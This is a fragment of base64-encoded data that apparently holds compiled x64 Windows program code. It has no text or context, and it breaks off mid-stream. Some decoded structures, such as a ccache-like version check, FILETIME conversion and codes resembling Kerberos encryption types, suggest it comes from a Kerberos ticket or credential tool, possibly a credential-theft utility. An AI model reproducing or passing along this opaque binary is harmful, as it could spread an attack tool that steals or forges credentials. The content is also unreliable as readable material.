MSItV6EiLy0SLgogAAABIi5KQAAAA6PGX+/+FwHQRSIvTSI0NU7kFAOjuuPv/6xT/FabGAwCL0EiNDYW5BQDo2Lj7/0iLy/8Vr8YDAEiLTej/FeXIAwDrF0iNDeS5BQDrCYvQSI0NuboFAOisuPv/SIvP/xWDxgMASI0NHMUEAOiXuPv/SItN4P/GO3EED4Jf/f///xWiyAMA6xdIjQ1RuwUA6wmL0EiNDSa8BQDoabj7/zPASIucJKAAAABIg8RwQV9BXl9eXcPMzMxIiVwkCFVWV0FUQVVBVkFXSI1sJNlIgewAAQAATIv6RIvhM9tIjUwkUDPSQbioAAAARIvz6A+4AQBFM8lIiVwkIEyNBQi3BQBJi9dBi8zogQD8/0UzyYlEJDxMjQVvvAUASIlcJCBJi9dBi8zoYwD8/0UzyYlEJEBMjQVZvAUASIlcJCBJi9dBi8zoRQD8/0yNTCRIiUQkOEyNBUm8BQBIiVwkIEmL10GLzOglAPz/hcAPhJ4DAABMi2wkSEiDz/9I/8dmQTlcfQB19blAAAAAZgP/jXcCD7fGA8GL0IlFd/8VEsUDAEiL2EiFwA+EbwMAAMcACAAAAEyNBfm7BQAzwEmL1zlEJDhBi8wPlcBMIXQkIEUzyYlDJOi2//v/hcB0B7gXAAAA62tMIXQkIEyNBcu7BQBFM8lJi9dBi8zokf/7/4XAdAe4BQAAAOtGTCF0JCBMjQWuuwUARTPJSYvXQYvM6Gz/+/+FwHQHuBIAAADrIUwhdCQgTI0FmbsFAEUzyUmL10GLzOhH//v/99gbwIPgEUiNS0BED7fGTI17EEiJSxhJi9VmQYk/iUMoZolzEuiRrwEASYvXSI0NZ7sFAOiKtvv/RTPkvigAGcBMOSXz7QcAdB+LVXdIjUV/TI1Nd0iJRCQgTI1EJDBIi8voOPb//+sCi8aFwA+IPAIAAItVf4XSD4gPAgAASItMJDBIiwFIiUQkUA8QQRjzD39EJFhIi0EISIlFjw8QQSjzD39Fl0iLQRBIiUWnDxBBOPMPf0WvSItBaEiJRc9Ii0FwSIlF10iLQXhIiUXfi0FIiUUDiUXni0FMiUXvSItBUEiJRfeLQViJRf+LgYgAAACJRQ9Ii4GQAAAASI0NyLoFAEiJRRfot7X7/0SLfCQ8RDlkJDh0EUWF/3QMSI0NN7sFAOiatfv/ugEAAABIjUwkUOhrJgAASI0NBMIEAOh/tfv/RDlkJEB0ZkiNFfG5BQBIjUwkUOiXAQAASIv4SIXAdE1Ii1QkMEiLyESLgogAAABIi5KQAAAA6DSU+/+FwHQRSIvXSI0NVrsFAOgxtfv/6xT/FenCAwCL0EiNDYi7BQDoG7X7/0iLz/8V8sIDAEWF/3QUSI0VVrUFAEiNTCRQ6CwBAABMi/BIi0wkMP8VDsUDAEWF/w+EnwAAAINLJAhMOSVS7AcAdB+LVXdIjUV/TI1Nd0iJRCQgTI1EJDBIi8vol/T//4vwhfZ4YYtVf4XSeFFIi1QkMEmLzkSLgogAAABIi5KQAAAA6IOT+/+FwHQRSYvWSI0NZbsFAOiAtPv/6xT/FTjCAwCL0EiNDde6BQDoarT7/0iLTCQw/xV/xAMA6xdIjQ1+uwUA6wmL1kiNDVO8BQDoRrT7/02F9nQ7SYvO/xUYwgMA6zCB+osBAMB1EUmL10iNDfy8BQDoH7T7/+sXSI0NPrsFAOsJi9BIjQ0TvAUA6Aa0+/9Ii8v/Fd3BAwDrDEiNDUy9BQDo77P7/zPASIucJEABAABIgcQAAQAAQV9BXkFdQVxfXl3DzMxIiVwkCEiJbCQQSIl0JBhXSIPsQEiL6kiL+ejFJgAAugAgAAC5QAAAAIvw/xVHwQMASIvYSIXAdH9Ei4+IAAAAhfZ0PUiLD0yLRzBIiWwkOEmDwAhIjVEYSIPBCEiJVCQwugAQAABIiUwkKEiLyEyJRCQgTI0Frr0FAOiB8v//6xlMjQXIvQUASIlsJCC6ABAAAEiLy+hm8v//M8mFwA+fwYXJSIvLdAfoQ5T7/+sJ/xX7wAMASIvYSItsJFhIi8NIi1wkUEiLdCRgSIPEQF/DSIlcJAhVVldBVEFVQVZBV0iNbCSgSIHscAEAADPbx0WI9AEAADPAiF0wRTPJSIlFMUyNBfinBQBIiUU5SIlFQUSL44lFSUSL62aJRU2L+4hFT0iL8oldoESL8YldqEiJXRBIiV0YSIldkEiJXYBIiV2wSIldAEiJXCQg6AT7+/+JRaxMjU0gSI0FEr0FAEiL1kyNBSi9BQBIiUQkIEGLzujf+vv/TI1NwEiJXCQgTI0FG70FAEiL1kGLzujE+vv/hcB1MEyNTcBIiVwkIEyNBQy9BQBIi9ZBi87opfr7/4XAdRFIjQ3+xQUA6BGy+//pJgwAAEyNTZhIiVwkIEyNBbyEBQBIi9ZBi87odfr7/4XAD4SjCgAASItNmLouAAAA6COoAQBIi9hIhcAPhHkKAAArXZi5QAAAAIvTSIPCAv8VY78DAEiJRehIhcAPhMgLAADR63QiTIttmEyL+Ewr6EMPtwwv6CKnAgBmQYkHTY1/AkiD6wF16DPbTI1NCEyNBVt9BQBIiVwkIEiL1kGLzujv+fv/hcAPhOoJAABIi00ISI1VKP8VvbgDAIXAD4S+CQAATI1NkEiJXCQgTI0F7bUFAEiL1kGLzui2+fv/hcB0D8eFsAAAAAMAAADpsAAAAEyNTZBIiVwkIEyNBbe1BQBIi9ZBi87oiPn7/4XAD4WDAAAATI1NkEiJXCQgTI0F3LsFAEiL1kGLzuhl+fv/hcB1ZEyNTZBIiVwkIEyNBZW1BQBIi9ZBi87oRvn7/4XAdAzHhbAAAAARAAAA60NMjU2QSIlcJCBMjQVatQUASIvWQYvO6Bv5+/+FwHQMx4WwAAAAEgAAAOsYi4WwAAAAiYWwAAAA6wrHhbAAAAAXAAAASDldkA+EtwgAAEyNTRBIiVwkIEyNBVW7BQBIi9ZBi87ozvj7/0yNTRhIiVwkIEyNBdK0BQBIi9ZBi87os/j7/0yNjbgAAABIiVwkIEyNBSy7BQBIi9ZBi87olfj7/4XAdBRIi424AAAARTPAM9LoXKQCAIlFiEyNjbgAAABIiVwkIEyNBf66BQBIi9ZBi87oX/j7/4XAdBRIi424AAAARTPAM9LoJqQCAIlFqEyNjbgAAABIiVwkIEyNBdi6BQBIi9ZBi87oKfj7/4XAD4TeAAAARIvrM8BIi524AAAATIv7SIXbD4TSAAAAZkE5B3QxRTPAM9JJi8/o0qMCAIXAdANB/8W6LAAAAEmLz+impQEATIv4M8BNhf90BkmDxwJ1yUWF7Q+EkgAAAEGL1blAAAAASMHiA/8V27wDADPJSIlFgEiFwHRURIv5ZjkLdEhFO/1zQ0UzwDPSSIvL6G6jAgCFwHQVSItNgEGL10H/x8dE0QQHAAAAiQTRuiwAAABIi8voMKUBADPJSIvYSIXAdAZIg8MCdbNIi0WAM9tFhe10HEiFwHQXTIv4SIlF4OsfRIutsAAAAEiLw+vhM9tMjT2qmgcAQb0FAAAATIl94EyNjbgAAABIiVwkIEyNBcW5BQBIi9ZBi87oBvf7/4XAD4RZAQAASIuNuAAAAOjy7AEASIvYSIlF8DPASIXbD4Q5AQAAZjkDdEq6LAAAAEiLy+iSpAEAM/9IiUWgSIXAdANmiThIjVVQSIvL/xWXtQMAhcB0DUiLTVBB/8T/Ff67AwBIi12gM8BIhdt0BkiDwwJ1sUiLTfBEiWWg6AjtAQAz24v7RYXkD4TSAAAAQYvUjUtASMHiBP8Vi7sDAEiJRbBIhcAPhLUAAABIi424AAAA6E7sAQAzyUiJRfhIi9hIhcAPhJUAAABMi32wi8GJjbgAAABmOQt0c0E7xHNuuiwAAABIi8vo3aMBADP/SIlFWEiFwHQDZok4i4W4AAAASIvLSMHgBEkDx0iL0EiJRfD/FdK0AwAzyYXAdBtIi0Xwx0AIBwAAAIuFuAAAAP/AiYW4AAAA6waLhbgAAABIi11YSIXbdAZIg8MCdYhIi0346DPsAQBIi30ATIt94DPbTI2NuAAAAEiJXCQgTI0FVrgFAEiL1kGLzuiH9fv/hcB0D0iLjbgAAADo5xUAAEiL+IudsAAAAEiNVbiLy/8VPr4DAEUz24XAD4gQBQAATItNuEmDyP9Ii02QRYtRDEn/wGZGORxBdfZBi8NDjRQSTDvCD5TAhcAPhMEEAABEi8hIjVUwRYvC6F3x+/9Mi024hcAPhKYEAABIjQXatwUASIvWTI2NuAAAAEiJRCQgTI0FzLcFAEGLzujo9Pv/SI1NyP8VYrcDAEiLjbgAAABFM8Az0uh5oAIASGPITI2NuAAAAExpwQC6PNxIuL1CeuXVlL/WQYvOSPdlyEjB6hdIacKAlpgASIvWSSvATI0Fl7cFAEiJRchIiUXQSIlF2EiNBXS3BQBIiUQkIOh29Pv/SIuduAAAAEUzwEiLyzPS6D6gAgCLwEyNjbgAAABIacgARsMjTI0FX7cFAEiJXCQgSAFN0EiL1kGLzug39Pv/SIuNuAAAAEUzwDPS6AKgAgBMi03oTItFmEiLVcCLwEhpyABGwyOLRYhIAU3YSI0NN7cFAIlEJChIi0UISIlEJCDobav7/0iNDaa3BQDoYav7/0Uz9kWF7XQeSYvfQYv1ixNIjQ2qtwUA6EWr+/9IjVsISIPuAXXoRYXkdDZIjQ2XtwUA6Cqr+/9FheR0JUiLXbBBi/RIiwvolvL7/0iNDYeqBQDoCqv7/0iNWxBIg+4BdeJIhf8PhEcBAABIjQ14twUA6Ouq+/8zyUSJtbgAAAA5Dw+GKgEAAEUz5EGL1kiNDX3EBQDoyKr7/0iLRwhIjQ2FxAUAQYveSAPbixTY6K+q+/9Ii0cIRYv8RDlk2AQPhtIAAABBi9dIjQ2DxAUA6I6q+/9Ii0cIQYvPSMHhBUiJTfhIi1TYCEiLFApIjQ1/xAUA6Gqq+/9Ii0cIQYv0TIt1+EyLRNgITQPGRTlgEHZtQYtQCIvKg+kBdDiD6QF0KoPpAXQcg/kDdA5IjQ0AxQUA6Cuq+//rMUiNDcLEBQDrGUiNDZHEBQDrEEiNDWDEBQDrB0iNDS/EBQBJi1AYi8ZIixTC6Pip+/9Ii0cI/8ZMi0TYCE0DxkE7cBByk0iLRwhB/8dEO3zYBA+CNf///0SLtbgAAABB/8ZEibW4AAAARDs3D4Lh/v//RItloEyLfeBIjQ1RtgUA6KSp+/9Ii0W4SI1NMEUzwItQDOhd7/v/RIu1sAAAAEGLzujWHAAASIvQSI0NQLYFAOhzqfv/SIt1EEiF9nQPSIvWSI0NOLYFAOhbqfv/SItdGEiF23QPSIvTSI0NQLYFAOhDqfv/SI0NVLYFAOg3qfv/SI1NyOhS8Pv/SI0Nn6gFAOgiqfv/SI1N0Og98Pv/SI0NiqgFAOgNqfv/SI1N2Ogo8Pv/SI0NfbUEAOj4qPv/SItVIEiNBSW2BQAzyTlNrEiNDUm2BQBID0XQ6Nio+/+LRahMi85Mi0XoSItVmEiJvCSAAAAAiUQkeEiLRbBEiWQkcEiJRCRoi0WIRIlsJGBMiXwkWIlEJFBIi0W4RIl0JEiLSAxIjUUwiUwkQEiLTcBIiUQkOEiLRShIiUQkMEiNRchIiUQkKEiJXCQg6G4DAAAz9kiL2EiFwHRrOXWsdCWLEEiLSAjomOn//4XAeExMi0WYSI0N1bUFAEiLVcDoNKj7/+s2RIsASItQCEiLTSDoEof7/4XAdA5IjQ1HtgUA6BKo+//rFP8VyrUDAIvQSI0NebYFAOj8p/v/SIvL/xXLuAMA6z9IjQ3itgUA6OWn+//rMUWLQQyLy+gsGwAATIvISI0NNrcFAEONFADoxaf7/+sRRIvASI0N0bcFAIvT6LKn+/8z2+sTSI0Nr7gFAOiip/v/TIu9sAAAAEiLTSj/FXG1AwDrKf8VSbUDAIvQSI0NSLkFAOh7p/v/6wxIjQ3quQUA6G2n+/9Mi72wAAAASItN6P8VPLUDAEyLbbDrI0iNDTe6BQDoSqf7/zPb6wxIjQ23ugUA6Dqn+/9Mi72wAAAASDldgHQJSYvP/xUEtQMATYXtdClFheR0JEmL3UGL9EiLC/8V67QDAEiNWxBIg+4Bde0z20mLzf8V1rQDAEiF/w+EBwEAADkfD4T2AAAASDlfCA+E7AAAAESL8zkfD4bXAAAARTPtSItPCEGL3kjB4wRIA8uLQQSFwA+ErwAAAEw5aQgPhKUAAABFi/2FwA+EiwAAAEiLQQhBi/dIweYFSIsMBkiFyXQF6I7lAQBIi0cISItEAwhIA8aLSBCFyXRLTDloGHRFRYvlhcl0KkiLQBhBi8xIiwzISIXJdAXoWeUBAEiLRwhB/8RIi0QDCEgDxkQ7YBBy1kiLRwhIi0wDCEiLTDEY/xUItAMASItPCEH/x0gDy0Q7eQQPgnX///9Ii08ISItMCwj/FeWzAwBB/8ZEOzcPgiz///9Ii08I/xXPswMASIvP/xXGswMAM8BIi5wksAEAAEiBxHABAABBX0FeQV1BXF9eXcPMTIvcSYlbCEmJaxBJiXMYV0FWQVdIg+wwSIu8JIAAAABBi/FNi/hNjUs4QbgCAAAASIsH/1Aoi+iFwHh4SItcJHgz0kyLB4vGiTNBi0gE9/GF0nQGK8oDzokLQYtAELlAAAAAAQOLE/8VA7MDAEyLdCRwSYkGSIXAdCxMixdMi8hIi4wkgAAAAESLxkmL10iJXCQgQf9SMIvohcB5CUmLDv8VArMDAEiLB0iNjCSAAAAA/1BASItcJFCLxUiLbCRYSIt0JGBIg8QwQV9BXl/DzEiLxEiJWAhIiXAQSIl4GFVBVEFVQVZBV0iNqKj+//9IgewwAgAATYv4TIvySIvZM9JBuKgAAABIjUwkQEmL+eispAEAM9JIjU3wQbg4AQAA6JukAQAz9kSNbkBBi82NVhj/FTmyAwBIiUQkcESNZgFIhcB0IGZEiWACSIvTSItEJHBmRIkgSItMJHBIg8EI/xXDtgMAuigAAABBi83/Ff2xAwBIiUQkQLsCAAAASIXAdElmiVgCSI0VK68FAEiLRCRASIX/SA9F12aJGEiLTCRASIPBCP8VfbYDAEiLhYABAABJi9ZIi0wkQEiFwEgPRdBIg8EY/xVdtgMASYvWSI1MJEj/FU+2AwCLldgBAABI998PEEQkSESLraABAAAbwESLtagBAAAlAADA/wUAAOBARIl1sIlFyLlAAAAAi8JEiXXMweAQQQvERIltuIXSQYvVDxFEJHgPRdiJXdAPEUQkYP8VOLEDAEiJRcBIhcB0DItVuEiLyP8V47QDAEiLjYgBAABJi9dmD28FkQUHAGYPb8hmD39FAGYPf0UQSIsBSIlFmEiJRfBIi0EISIlFoEiLQRBIjY3AAAAASIlFqEi4/////////39IiUX4/xWFtQMASIuNuAEAAEiLRCRwDxBACEiLhZABAABIIbUQAQAAIbUYAQAASCG1IAEAAEiJhdAAAACLhbABAACJhYQAAACLAYmFiAAAAIuFwAEAAImFjAAAAEiLhcgBAABIiY2QAAAAi43QAQAAx4XgAAAAEAIAAImNAAEAAEiJhQgBAADzD39FIEiFwHQLhcl0B4ONmAAAACBBi8aD6AN0H4PoDnQTQTvEdAe7dv///+sTuxAAAADrDLsPAAAA6wW7e////0yLheABAABIjYXYAQAATI2NiAEAAEiJRCQgi9NIjU3w6NIOAACFwA+EJQEAAEiNDYu2BQDoLqL7/0iLvYgBAABEi8NMi42YAQAASIvPi5XYAQAARIlsJCDomhEAAIXAD4jkAAAASI0Ne7YFAOj2ofv/QYvM/xW1sgMASIXAdBxEi4XYAQAASI1MJEBMi8hIi9foNRwAAEiL2OsCM9tIhdsPhKMAAABIjQ1atgUA6LWh+/9EiztIjZWIAQAATItjCEGLzv8V/rIDAIXAeGVIi42YAQAASI2FiAEAAEiJRCQwRYvPSI1F2E2LxEiJRCQoQYvVSI1F4EiJRCQg6J/7//+FwHguSI0NNLYFAOhXofv/M9JIjUwkQOgTGAAASIvwSIXAdBxIjQ1MtgUA6Deh+//rDovQSI0NdLYFAOgnofv/SIvL/xX2sQMASIvP/xX1rgMASItN4EiFyXQG/xXmrgMASItNwEiFyXQG/xXXrgMASItMJHBIhcl0Bv8Vx64DAEiLTCRASIXJdAb/FbeuAwBMjZwkMAIAAEiLxkmLWzBJi3M4SYt7QEmL40FfQV5BXUFcXcPMzMxIiVwkCEiJbCQQSIl0JBhXQVZBV0iD7CBIi3QkYEiL2kSL+UGL6blAAAAATYvwSIsGi1AM/xUergMASIv4SIXAdHyDPc/cBwAGSIvLcwxMiwZIi9BB/1BI6w9IiwZMi89Ei8VJi9b/UEiL2IXAeDZBi8/ojRMAAEiL0EiNDf+1BQDoKqD7/0iLBkUzwEiLz4tQDOjl5fv/SI0NkqwEAOgNoPv/6w6L00iNDeq1BQDo/Z/7/0iLz/8V1K0DAOsEi1wkaEiLbCRIi8NIi1wkQEiLdCRQSIPEIEFfQV5fw8zMzEiJXCQISIl0JBBVV0FWSI1sJLlIgeygAAAAZg9vBcYBBwBMjU13RTP2TI0FkG4FAEyJdXdIi9pMiXV/i/lMiXXXvgAQAABEiXXnTIl170SJdfdMiXX/8w9/RTdMiXQkIOjv5/v/TI1Nf0yJdCQgTI0FO6oFAEiL04vP6NXn+/9MjU3XTIl0JCBMjQUBcgUASIvTi8/ou+f7/0yNTd9MiXQkIEyNBX+1BQBIi9OLz+ih5/v/hcB0EEiLTd9FM8Az0uhrkwIAi/BIi1V3SI1NF/8VW7EDAEiLVX9IjU0n/xVNsQMASItV10iNTQf/FT+xAwBFM8BIjVUHSI1NB/8VprADAA+3RQe7QAAAAGaDwAKLy2YDRScPt9BmiUXp/xVWrAMASIlF70iFwA+EvQAAAEiNVQdIjU3n/xUDsQMASI1VJ0iNTef/FfWwAwAPt0UXi8tmg8ACZgNF5w+30GaJRfn/FRKsAwBIiUX/SIXAdHNIjVUXSI1N9/8Vw7ADAEiNVedIjU33/xW1sAMASI1dN78EAAAAiwtIjVV3/xWQrwMAhcB4KoM7A0iNTfeJRCQoSI1VF0gPRNFIjUV3iwtMjUXnRIvOSIlEJCDoUv3//0iDwwRIg+8BdbxIi03//xXOqwMASItN7/8VxKsDAEyNnCSgAAAAM8BJi1sgSYtzKEmL40FeX13DzMxIiVwkEESJTCQgRIlEJBhVVldBVEFVQVZBV0iL7EiD7FBFi/BIi8KFyQ+E4AMAAEiLCEyNRUBIjVXo6NV9+/+FwA+EsgMAAEyLfei5BAUAAEEPtwdmwcgIZjvBD4WBAwAAQQ+3RwJIg2XgAGbByAgPt8hIg8EESQPPSIlN2ESLSQRBD8lFhckPhGEDAABMjUXwSI1V4EiNTdjohgQAAEyLbeBNhe0PhEMDAABMjUXwSYvVSI0Nl7MFAOh2DwAARItlQINl0ABNA+dIi13YSTvcD4MCAwAARIt90ESLbVhBi9dIjQ2IswUA6Nuc+/+6qAAAAI1KmP8VdaoDAEiL+EiFwA+EvQIAAESLSwRIjVAwSIMiAEEPyUWFyXQRTI1AOEiNTdjo/AMAAEiLXdhEi0sESIMnAEEPyUWFyXQUTI1HCEiL10iNTdjo2AMAAEiLXdhIiw/oEBIAAEiNTwhIiUcYSI1XIOhT4Pv/D7cDZsHICA+3wIlHcA+3QwJmwcgID7fAiYeMAAAAD7dDBEiDwwZmwcgID7fIiU94hcl0KIvRuUAAAAD/FcapAwBIiYeAAAAASIXAdA9Ei0d4SIvTSIvI6PuUAQCLR3hIugCRELYCAAAASAPYi0MED8hIY8hIA8pIacGAlpgASIlHWItDCA/ISGPISAPKSGnBgJaYAEiJR2CLQwwPyEhjyEgDykhpwYCWmABIiUdoi0MRD8iJh4gAAACLQxVIg8MZD8iFwHQWi8iLQwJIg8MGD8iLwEgD2EiD6QF17IsDSIPDBA/IhcB0FovIi0MCSIPDBg/Ii8BIA9hIg+kBdeyLA0iDwwQPyImHmAAAAMeHkAAAAAIAAACFwHQri9C5QAAAAP8V4KgDAEiJh6AAAABIhcB0EkSLh5gAAABIi9NIi8joEpQBAIuHmAAAAEiNVyBIA9hIjQ2WgAQAQbABiwMPyIvASIPABEgD2EiJXdj/FVStAwCEwA+FxQAAALoBAAAASIvP6LcLAABFhe11CUWF9g+EvQAAALoBAAAASIvP6IQRAABIi/BIhcAPhKQAAABFhfZ0KUiNDWSxBQDon5r7/4sWSItOCOjg2///hcB4ZkiNDQF5BQDohJr7/+tYSIvXQYvP6HsCAABMi/BIhcB0QUSLBkiLyEiLVgjoUHn7/4XAdBFJi9ZIjQ1KsQUA6E2a+//rFP8VBagDAIvQSI0NdLEFAOg3mvv/SYvO/xUOqAMARIt1UEiLzv8V+aoDAOsTSI0VqH8EAEiNDdGxBQDoDJr7/0iLz+i8DgAAQf/HSTvcD4IO/f//TIt96EyLbeBJi83oQBAAAOsMSI0Nx7EFAOjamfv/SYvP/xWxpwMA6yL/FYmnAwCL0EiNDSiyBQDou5n7/+sMSI0NqrIFAOitmfv/M8BIi5wkmAAAAEiDxFBBX0FeQV1BXF9eXcPMzMxIg+woRTPJRY1BAei4+///M8BIg8Qow8xIiVwkCFdIg+wwSINkJCAATI0FYZgFAEUzyUiL2ov56Njh+/9Ei8hFM8BIi9OLz+h8+///SItcJEAzwEiDxDBfw8zMzEiLxEiJWAhXSIPsMEyLAUiL+jPbRYsISYPABEEPyWZEiUjqZkSJSOhMiUDwQQ+3wWZFA8lmRIkKSQPAZkGDwQJIiQFBD7fRjUtAZolXAv8ViKYDAEiJRwhIhcB0JEUzwEiNVCQgSIvP/xWmqgMAhcAPmcOF23UKSItPCP8Vk6YDAIvDSItcJEBIg8QwX8PMzEiJXCQISIlsJBBIiXQkGFdBVkFXSIPsIEyL+kGL8TP/TIvxSYvoi9+NVv9IweIEjU9ASIPCGP8VEKYDAEmJB0iFwHRHSYsWZolwAkmLB4sKD8lmiQhIjUIISIvVSYkGSYvO6An///+L2IX2dB5JixdJi85Ig8IISAPX6PH+//8j2EiDxxBIg+4BdeJIi2wkSIvDSItcJEBIi3QkUEiDxCBBX0FeX8PMzEiJXCQISIlsJBBIiXQkGFdIg+xQi+lIi/pIi8ro7woAALoAIAAAuUAAAACL8P8VcaUDAEiL2EiFwA+ElgAAAEiNBQaYBQBEi82F9nRHSIsPTItHMEiJRCRASYPACIuHiAAAAEiNURhIg8EISIlUJDi6ABAAAEiJTCQwSIvLTIlEJChMjQWboQUAiUQkIOia1v//6yNIiUQkKEyNBeSwBQCLh4gAAAC6ABAAAEiLy4lEJCDoddb//zPJhcAPn8GFyUiLy3QH6FJ4+//rCf8VCqUDAEiL2EiLbCRoSIvDSItcJGBIi3QkcEiDxFBfw8zMzEiJXCQIVVZXQVRBVUFWQVdIi+xIg+xAuiAAAABIi/GNSiD/FYykAwBIi9hIhcAPhJ0CAABIi87oVNUBAEyNNYVwBQBIi/hIhcB0J0iDZeAASIvI6wT/AzPJTI1F4EmL1ujLjAIASIXAdetIi8/ootUBAIsTuUAAAABIweIE/xUxpAMASIlDCEiFwA+EQQIAAEiLzuj41AEASIlF8EyL4EiFwA+EKQIAAEiDZeAATI1F4INlSABJi9ZIi8jocIwCAEiL8EiFwA+E/QEAAESLZUhIi0sIQYv8SAP/xwT5AQAAAEiLzuin1AEATIvwSIXAdDFIg2VYAEiLyOsKSItDCP9E+AQzyUyNRVhIjRWcrwUA6BuMAgBIhcB14UmLzujy1AEASItDCLlAAAAAi1T4BEjB4gX/FXujAwBIi0sISIlE+QhIhcAPhFkBAABIg2VYAEiLzkUz7ekwAQAASItLCEyNRehBi/VIweYFSItU+QhIi8jHRDIIAwAAAEiNFS+vBQBIg2XoAOiliwIASIXAD4TyAAAASIvI6PTTAQBIi0sISItU+QhIiQQWSIXAD4TUAAAATI1F6DPJSI0V8a4FAOhsiwIATIv4SIXAD4S2AAAASIvI6LjTAQBMi/BIhcB0NkiDZVAASIvI6w9Ii0MISItM+Aj/RDEQM8lMjUVQSI0VsK4FAOgniwIASIXAddxJi87o/tMBAEiLQwhIi0z4CItUMRC5QAAAAEjB4gP/FYKiAwBIi0sISItU+QhIiUQyGEiFwHRBSINlUABJi89FM/brH0iLyOg20wEASItLCEiLTPkISItMMRhKiQTxQf/GM8lMjUVQSI0VOK4FAOivigIASIXAdcxB/8UzyUyNRVhIjRUWrgUA6JWKAgBIhcAPhbf+//9MjUXgM8lIjRUXbgUAQf/E6HeKAgBIi/BIhcAPhQv+//9Mi2XwSYvM6EPTAQBIi8NIi5wkgAAAAEiDxEBBX0FeQV1BXF9eXcNIiVwkGEiJTCQIVVZXSIvsSIPsYDPbSI1F0EiJGkyNDTjS+/9IiUUoSI1NIEGJGEiNBfrR+/9Ji/hIiUQkIEiL8old0EyNReRIiV3YSI1V2EiJXeBmiV3oiV3sSIld8Ojwwfv/hcB0NItF5EyNDULS+/+JRdBIjU0oSI0FCNL7/0yLx0iL1kiJRCQg6MTB+/9Ii03Yi9j/FWShAwCLw0iLnCSQAAAASIPEYF9eXcPMzEiLxEyJSCBMiUAYSIlICFVTVldBVEFVQVZBV0iNaKlIgeyIAAAAM9uJVedEi8KJXddIjVX/SIld90GLyEiJXe9EjWsEiV3Di/uJXb9Ei/uJXWfHRctIAAAA/xWBpAMAhcAPiIECAABIi0X/jXMITI0NP9L7/0yNRcOLUASLxkED1YvKiVXfg+EHK8H32RvJI8hIjQXw0fv/A8pIiUQkIIlN00iNVfdIjU1f6PXA+/+FwHQWi1XDi8qD4Qd0BovGK8HrAovDA8LrA4tFZ0iLXV+5QAAAAIlFx0QPt2MwQYPECkGL1ESJZdv/FSqgAwBMi/BIhcB0M0iLC0iJCA+3SzBmiUgIRIvBSItTOEiNSAroVIsBAEGLzIvGg+EHK8H32RvbI9hBA9zrA4tdZ0iLRW+JXc9IhcB0SkyNRb9Ii8hIjVXv6Aj+//9Ei32/hcB0KUGLz4PhB3QGi8YrwesCM8BIi33vQo0MOLpYAAAAiU1niVXLRI1qresQSIt974tNZ+sCi8+6SAAAAEyLZfdNheQPhDYBAABNhfYPhCQBAACLRdONBEMDRccDwgPISItFf4vRiQi5QAAAAP8VWZ8DAEiL2EiLRXdIiRhIhdsPhPEAAACLRcNJi9SLTctEiSuDYwQAiUMMuAEAAACJQwhIiUsQSAPLRItDDIlF1+hoigEAi0Xbi1XHiUMcx0MYCgAAAEgDUxBIiVMgRItDHEiNDBpJi9boQIoBAItFZ4XAdCaLVc9EiXssx0MoDQAAAEgDUyBIiVMwRItDLEiNDBpIi9foE4oBAESLVd9FjU3+TQPJQY1V/UgD0kaJVMsMQsdEywgGAAAAi0zTDIvBg+AHdAQr8OsCM/ZIi1TTEEWNRf9Ei13nTQPAA85IA9FKiVTLEESJHBqLVdNGiVTDDELHRMMIBwAAAEoDVMsQSolUwxBEiRwaSYvM/xWEngMATYX2dAlJi87/FXaeAwBIhf90CUiLz/8VaJ4DAItF10iBxIgAAABBX0FeQV1BXF9eW13DzEiJXCQITIlMJCCJVCQQVVZXQVRBVUFWQVdIi+xIg+wwSIv5SI1V8EGLyEUz/0Uz7f8VqqEDAIvYhcAPiPcAAAAz9rslAgDAOTcPhugAAABEi/ZNA/ZCi0T3CIPoBoP4AXcrSItF8EyNZwROA2T3EDPSSYvMRItABOjrjwEAQoN89wgGdQVNi/zrA02L7P/GOzdyvE2F/w+EmwAAAE2F7Q+EkgAAAEiLRfBMjU34SIt1WEG+EQAAAItVYEWLxkiLzv9QMIvYhcB4bkiLRfBMi8eLVUhIi034/1AYSItF8EmL10iLTfj/UCBIi0XwSI1N+P9QKEiLRfBMjU34i1VgRYvGSIvO/1Awi9iFwHgqSItF8E2Lx0iLTfiLUAT/UBhIi0XwSYvVSItN+P9QIEiLRfBIjU34/1Aoi8NIi1wkcEiDxDBBX0FeQV1BXF9eXcPMzEiJXCQIV0iD7CBIi9mL+kiNDfqpBQDoBY/7/0iNS1joINb7/0iNDW2OBQDo8I77/0iNS2DoC9b7/0iNDViOBQDo2477/0iNS2jo9tX7/0iLE0yNQwhIjQ3sqQUA6CsBAABIi1MYTI1DIEiNDQCqBQDoFwEAAEiLUzBMjUM4SI0NFKoFAOgDAQAASIN7UAB0EEiNU0hIjQ0lqgUA6ICO+/+Lk4gAAABIjQ0rqgUA6G6O+/+Li4gAAADofwAAAIX/dEGLU3CLyuipAQAATIvASI0NM6oFAOhGjvv/SIO7gAAAAAB0HkiNDW2qBQDoMI77/4tTeEUzwEiLi4AAAADo6tP7/4uTjAAAAIvK6GUBAABEi4uQAAAASI0NS6oFAEyLwOj7jfv/SI0NpKoFAEiLXCQwSIPEIF/p5Y37/8xIiVwkCEiJdCQQV0iD7CCL8UiNPfR7BAAz241LEIvG0+ioAXQPSIsXSI0NvfAEAOiwjfv//8NIg8cIg/sQcttIi1wkMEiLdCQ4SIPEIF/DzEiJXCQISIlsJBBIiXQkGFdIg+wgM+1Ji/BIi9pIhcl0D0iL0UiNDVEkBQDoZI37/0iF23Q9D78TSI0NVasFAOhQjfv/D7f9ZjtrAnMxD7fHSI1TCEjB4ARIjQ1NqwUASAPQ6C2N+/9m/8dmO3sCct3rDEiNDUOrBQDoFo37/0iF9nQPSIvWSI0NP6sFAOgCjfv/SItcJDBIi2wkOEiLdCRASIPEIF/DzEiFyXQ1SItBMEiFwHQsugEAAABmORB1ImY5UAJ1HEyLAU2FwHQUQQ+3AGYrwmaD+AJ3B2ZBOVACdwIz0ovCw8y4f////zvID4/JAAAAD4S7AAAAuHn///87yH9edFSB+Wv///90RIH5bP///3Q0gflz////dCSB+XT///90FIH5eP///w+F7wAAAEiNBfusBQDDSI0Fi6sFAMNIjQXTqwUAw0iNBVutBQDDSI0Fe60FAMNIjQUjrQUAw4H5ev///3REgfl7////dDSB+Xz///90JIH5ff///3QUgfl+////D4WTAAAASI0Fr6sFAMNIjQX3qwUAw0iNBV+qBQDDSI0Fr6wFAMNIjQVXrAUAw0iNBTerBQDDg/kRf0p0QIP5gHQzhcl0J4P5AXQag/kCdA2D+QN1REiNBZiqBQDDSI0FaKoFAMNIjQU4qgUAw0iNBeCpBQDDSI0FaKsFAMNIjQXwrAUAw4PpEnQvg+kCdCKD6QN0FYP5AXQISI0FJK0FAMNIjQW0qwUAw0iNBYSrBQDDSI0FZKoFAMNIjQXcrAUAw8zMzEiFyQ+E3AAAAEiJXCQIV0iD